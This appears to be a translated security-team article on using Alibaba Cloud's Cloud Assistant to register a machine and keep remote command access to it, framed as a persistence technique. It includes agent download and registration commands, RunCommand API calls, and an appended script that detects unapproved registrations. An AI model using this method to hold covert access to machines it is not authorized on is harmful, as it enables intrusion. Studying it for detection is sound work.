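Using Alibaba Cloud's Cloud Assistant to Bring Hosts Online and Maintain Access
Introduction
Cloud Assistant is a native automated O&M tool built for Elastic Compute Service (ECS). Without passwords, logins, or jump servers, it lets you perform batch O&M, run commands (Shell, PowerShell, Bat, and so on), and send files on ECS instances. Typical use cases include installing and uninstalling software, starting or stopping services, distributing configuration files, and running general commands (or scripts).
Limits
- After Base64 encoding, the size limits for Bat, PowerShell, or Shell scripts together with their custom parameters depend on the use case:
  - Create a command: the combined size cannot exceed 18 KB
  - Run immediately and save the command: the combined size cannot exceed 18 KB
  - Run immediately without saving the command: the combined size cannot exceed 24 KB
  - Upload a file: the file size cannot exceed 32 KB
- A single command can have no more than 20 custom parameters.
- You can run Cloud Assistant commands only on the following operating systems:
  - Alibaba Cloud Linux
  - CentOS 6/7/8 and later
  - CoreOS
  - Debian 8/9/10 and later
  - OpenSUSE
  - Rocky Linux
  - RedHat 5/6/7 and later. On RedHat you must download the rpm package and install the Cloud Assistant client yourself; for details, see Install the Cloud Assistant client: https://help.aliyun.com/document_detail/64921.htm#concept-wtg-32x-ydb
  - SUSE Linux Enterprise Server 11/12/15 and later
  - Ubuntu 12/14/16/18 and later
  - Windows Server 2012/2016/2019 and later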
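Procedure
Linux
1. Open the Alibaba Cloud console and go to Products and Services -> Elastic Compute Service (ECS)
2. Select O&M and Monitoring -> Cloud Assistant -> Managed Instances -> Create Activation Code
3. Enter an instance name prefix and click Generate Activation Code
4. Save the generated command so it can be run on the target machine (the ActivationCode is visible only at creation time)
5. Run the saved command on the target machine
6. Check whether the Cloud Assistant managed instance is online
7. Run commands
Windows
1. Manually download the exe from the activation code page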
https://aliyun-client-assist.oss-accelerate.aliyuncs.com/windows/aliyun_agent_latest_setup.exe
2. Copy the exe to the target machine and run it with the following arguments
aliyun_agent_latest_setup.exe /S --register --RegionId="cn-shanghai" --ActivationCode="a-sh0xxxxxxxxxxxxxxgtJO2Kg" --ActivationId="AA749DC8-ADFC-5236-BFB9-FBA2AE249558"
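3. Check whether the Cloud Assistant managed instance is online
4. Click Remote Login to run commands
API documentation
# CreateActivation: create an activation code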
https://help.aliyun.com/document_detail/200781.html
# DescribeManagedInstances: look up the instance ID
https://help.aliyun.com/document_detail/200857.html
# RunCommand: run a command
https://help.aliyun.com/document_detail/141751.html
# DescribeInvocationResults: get the command execution result
https://help.aliyun.com/document_detail/64845.html
Online debugging
Create an activation code:
https://next.api.aliyun.com/api/Ecs/2014-05-26/CreateActivation
Look up the instance ID:
https://next.api.aliyun.com/api/Ecs/2014-05-26/DescribeManagedInstances
Run a command:
https://next.api.aliyun.com/api/Ecs/2014-05-26/RunCommand
Get the command execution result:
https://next.api.aliyun.com/api/Ecs/2014-05-26/DescribeInvocationResults
Automation (requires an AccessKeyID and AccessKeySecret)
1. Generate an activation code
https://ecs.aliyuncs.com/?Action=CreateActivation
&RegionId=cn-shanghai
Response
HTTP/1.1 200 OK
Content-Type:application/json
{
  "RequestId" : "4ECEEE12-56F1-4FBC-9AB1-890F1234****",
  "ActivationId" : "4ECEEE12-56F1-4FBC-9AB1-890F1234****",
  "ActivationCode" : "a-hz0ch3SwhOlE1234+Xo32lAZC****"
}
Save the ActivationId and ActivationCode.
2. Run the commands on the machine to register the instance
sudo wget https://aliyun-client-assist.oss-accelerate.aliyuncs.com/linux/aliyun_assist_latest.rpm
sudo rpm -ivh aliyun_assist_latest.rpm --force
sudo aliyun-service --register --RegionId "cn-shanghai" \
  --ActivationCode "a-hz0ch3SwhOlE1234+Xo32lAZC****" \
  --ActivationId "4ECEEE12-56F1-4FBC-9AB1-890F1234****"
3. Look up the InstanceId of the registered instance
https://ecs.aliyuncs.com/?Action=DescribeManagedInstances
&RegionId=cn-shanghai
Response
HTTP/1.1 200 OK
Content-Type:application/json
{
  "Instances" : [ {
    "MachineId" : "e03231b37ab14e53b5795ad625fc****",
    "InstanceId" : "mi-sh03fnca894kveo",
    "AgentVersion" : "2.2.0.102",
    "Connected" : true,
    "InvocationCount" : 1,
    "OsVersion" : "Linux_#38~18.04.1-Ubuntu SMP Wed Jan 6 18:26:30 UTC 2021_x86_64",
    "ActivationId" : "3704F543-F768-43FA-9864-897F75B3****",
    "Hostname" : "demo",
    "RegistrationTime" : "2021-01-20T08:57:56Z",
    "IntranetIp" : "10.0.**.**",
    "InstanceName" : "webAPP-linux-01",
    "InternetIp" : "40.65.**.**",
    "OsType" : "Linux",
    "LastInvokedTime" : "2021-01-20T09:00:40Z"
  } ],
  "TotalCount" : 1,
  "RequestId" : "77115469-F2C5-4ECA-94F7-FA04F2FDC8F4",
  "PageSize" : 10,
  "PageNumber" : 1
}
4. Run a command on the machine through the API
http(s)://ecs.aliyuncs.com/?Action=RunCommand
&CommandContent=whoami
&InstanceId.1=mi-sh03fnca894kveo
&RegionId=cn-hangzhou
&Type=RunShellScript
Response
HTTP/1.1 200 OK
Content-Type:application/json
{
  "RequestId" : "E69EF3CC-94CD-42E7-8926-F133B863****",
  "CommandId" : "c-7d2a745b412b4601b2d47f6a768d",
  "InvokeId" : "t-7d2a745b412b4601b2d47f6a768d****"
}
5. Get the command result
http(s)://ecs.aliyuncs.com/?Action=DescribeInvocationResults
&RegionId=cn-shanghai
&InstanceId=mi-sh03fnca894kveo
&CommandId=c-7d2a745b412b4601b2d47f6a768d
&PageNumber=1
&PageSize=1
Response
HTTP/1.1 200 OK
Content-Type:application/json
{
  "RequestId" : "473469C7-AA6F-4DC5-B3DB-A3DC0DE*****",
  "Invocation" : {
    "InvocationResults" : {
      "InvocationResult" : [ {
        "Dropped" : 0,
        "InvocationStatus" : "Success",
        "InstanceId" : "mi-sh03fnca894kveo",
        "ExitCode" : 0,
        "ErrorInfo" : "the specified instance does not exists",
        "StartTime" : "2019-12-20T06:15:55Z",
        "Repeats" : 0,
        "InvokeRecordStatus" : "Running",
        "FinishedTime" : "2019-12-20T06:15:56Z",
        "Output" : "MTU6MzA6MDEK",
        "CommandId" : "c-hz0jdfwcsr****",
        "ErrorCode" : "InstanceNotExists",
        "InvokeId" : "t-hz0jdfwd9f****",
        "StopTime" : "2020-01-19T09:15:47Z",
        "Username" : "root",
        "ContainerId" : "ab141ddfbacfe02d9dbc25966ed971536124527097398d419a6746873fea****",
        "ContainerName" : "test-container",
        "Tags" : [ {
          "TagKey" : "owner",
          "TagValue" : "zhangsan"
        } ]
      } ]
    },
    "TotalCount" : 1,
    "PageSize" : 1,
    "PageNumber" : 1
  }
}
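A host-side detection for the registration step above, added here as an example and not part of the original article: it scans process command lines for the Cloud Assistant registration commands shown on this page and flags any ActivationId the organisation did not issue. The approved-ID set, the function names, and the sample command lines are assumptions constructed for illustration.

```python
import re

# Agent binaries named in the steps above (Linux service, Windows installer).
AGENT = re.compile(r"(aliyun-service|aliyun_agent_latest_setup\.exe)\b", re.I)
# Accepts both forms used above: --Key "value" (Linux) and --Key="value" (Windows).
PARAM = re.compile(r'--(RegionId|ActivationId|ActivationCode)(?:=|\s+)"?([^"\s]+)"?')

def parse_registration(cmdline):
    """Return the registration parameters if cmdline registers a host with
    Cloud Assistant, otherwise None."""
    if not AGENT.search(cmdline) or not re.search(r"--register\b", cmdline):
        return None
    found = dict(PARAM.findall(cmdline))
    # The ActivationCode is a secret: keep a short prefix for correlation only.
    if "ActivationCode" in found:
        found["ActivationCode"] = found["ActivationCode"][:4] + "<redacted>"
    return found

def unapproved_registrations(cmdlines, approved_activation_ids):
    """Flag registrations whose ActivationId is missing or not approved."""
    approved = {a.upper() for a in approved_activation_ids}
    alerts = []
    for line in cmdlines:
        reg = parse_registration(line)
        if reg is not None and reg.get("ActivationId", "").upper() not in approved:
            alerts.append(reg)
    return alerts

# Constructed process command lines, built from the commands shown above.
SAMPLE_CMDLINES = [
    'sudo aliyun-service --register --RegionId "cn-shanghai" '
    '--ActivationCode "a-hz0ch3SwhOlE1234+Xo32lAZC****" '
    '--ActivationId "4ECEEE12-56F1-4FBC-9AB1-890F1234****"',
    'aliyun_agent_latest_setup.exe /S --register --RegionId="cn-shanghai" '
    '--ActivationCode="a-sh0xxxxxxxxxxxxxxgtJO2Kg" '
    '--ActivationId="AA749DC8-ADFC-5236-BFB9-FBA2AE249558"',
    "sudo rpm -ivh aliyun_assist_latest.rpm --force",
]

if __name__ == "__main__":
    # Assumption: the only activation the organisation issued itself.
    APPROVED = {"aa749dc8-adfc-5236-bfb9-fba2ae249558"}
    for alert in unapproved_registrations(SAMPLE_CMDLINES, APPROVED):
        print("unapproved Cloud Assistant registration:", alert)
```

Feed it command lines from whatever process-creation telemetry the host already produces; the RegionId and ActivationId in each alert identify which activation the host was registered against.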
References
https://help.aliyun.com/document_detail/201140.htm#section-fhj-e5i-yr4
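Originally published on the WeChat official account Evilc0de 安全团队 (Evilc0de Security Team): Using Alibaba Cloud's Cloud Assistant to Bring Hosts Online and Maintain Access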